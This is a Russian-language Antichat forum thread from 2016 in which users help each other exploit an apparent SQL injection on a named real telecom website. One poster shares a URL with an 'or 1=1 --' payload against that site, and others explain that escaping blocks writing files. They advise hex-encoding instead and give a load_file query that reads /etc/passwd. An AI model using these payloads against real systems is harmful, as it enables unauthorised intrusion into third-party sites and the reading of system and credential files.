HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.02.2016, 10:49
Setrus
Новичок
Регистрация: 12.02.2016
Сообщений: 9
С нами: 5395286

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #2  
Старый 12.02.2016, 13:15
kostea
Новичок
Регистрация: 23.12.2015
Сообщений: 29
С нами: 5468726

Репутация: 0
По умолчанию

Цитата:
Сообщение от Setrus  

Нет прав на запись в папку, судя по всему.
Когда нет прав пишет по другому
 
Ответить с цитированием

  #3  
Старый 15.02.2016, 00:04
ghost8
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
С нами: 5768246

Репутация: 0
По умолчанию

Цитата:
Сообщение от kostea  

Когда нет прав пишет по другому
Экранирование
 
Ответить с цитированием

  #4  
Старый 15.02.2016, 04:30
kostea
Новичок
Регистрация: 23.12.2015
Сообщений: 29
С нами: 5468726

Репутация: 0
По умолчанию

Цитата:
Сообщение от ghost8  

Экранирование
Приз в студию
 
Ответить с цитированием

  #5  
Старый 15.02.2016, 04:49
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
 
Ответить с цитированием

  #6  
Старый 15.02.2016, 05:12
kostea
Новичок
Регистрация: 23.12.2015
Сообщений: 29
С нами: 5468726

Репутация: 0
По умолчанию

Цитата:
Сообщение от RWD  

Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
http://my.moldtelecom.md/scripturi/a...ord=or+1=1+--+

Вы или помогаете или не мусорьте
 
Ответить с цитированием

  #7  
Старый 15.02.2016, 09:45
ghost8
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
С нами: 5768246

Репутация: 0
По умолчанию

Цитата:
Сообщение от kostea  

Приз в студию
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла

Читай конфиги
 
Ответить с цитированием

  #8  
Старый 15.02.2016, 16:00
kostea
Новичок
Регистрация: 23.12.2015
Сообщений: 29
С нами: 5468726

Репутация: 0
По умолчанию

Цитата:
Сообщение от ghost8  

приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги
Пример можно а то читать тоже неполучилось
 
Ответить с цитированием

  #9  
Старый 15.02.2016, 19:33
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от kostea  

Пример можно а то читать тоже неполучилось
hex. прочитайте статью по MySQL injection
 
Ответить с цитированием

  #10  
Старый 15.02.2016, 22:56
ghost8
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
С нами: 5768246

Репутация: 0
По умолчанию

Цитата:
Сообщение от kostea  

Пример можно а то читать тоже неполучилось
Код:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.